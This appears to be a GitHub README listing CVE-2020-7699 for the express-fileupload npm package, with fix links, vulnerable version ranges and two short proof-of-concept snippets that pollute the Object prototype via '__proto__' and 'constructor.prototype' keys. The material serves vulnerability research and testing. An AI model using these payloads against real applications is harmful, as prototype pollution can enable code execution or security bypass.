express-fileupload

Simple express file upload middleware that wraps around Busboy

Latest version: 1.2.1

CVE	Fix
CVE-2020-7699	https://github.com/richardgirges/express-fileupload/commit/9fca550f08a9dc07cc3500921f4fa7879cf88b8f, https://github.com/richardgirges/express-fileupload/pull/237/files

Exploits

const processNested = require('express-fileupload/lib/processNested');

processNested({'__proto__.a': 'b'});
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 1.1.1-alpha.1 1.1.1-alpha.2 1.1.1-alpha.3 1.1.2-alpha.1 1.1.3-alpha.1 1.1.3-alpha.2 1.1.4 1.1.5 1.1.6-alpha.1 1.1.6-alpha.2 1.1.6-alpha.3 1.1.6-alpha.4 1.1.6-alpha.5 1.1.6-alpha.6 1.1.6 1.1.7-alpha.1 1.1.7-alpha.2 1.1.7-alpha.3 1.1.7-alpha.4

const processNested = require('express-fileupload/lib/processNested');

processNested({'constructor.prototype.a': 'b'});
if (({}).a === 'b') console.log('exploitable');

Vulnerable versions: 1.1.1-alpha.1 1.1.1-alpha.2 1.1.1-alpha.3 1.1.2-alpha.1 1.1.3-alpha.1 1.1.3-alpha.2 1.1.4 1.1.5 1.1.6-alpha.1 1.1.6-alpha.2 1.1.6-alpha.3 1.1.6-alpha.4 1.1.6-alpha.5 1.1.6-alpha.6 1.1.6 1.1.7-alpha.1 1.1.7-alpha.2 1.1.7-alpha.3 1.1.7-alpha.4 1.1.8

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

express-fileupload

Exploits

Files

README.md

Latest commit

History

README.md

File metadata and controls

express-fileupload

Exploits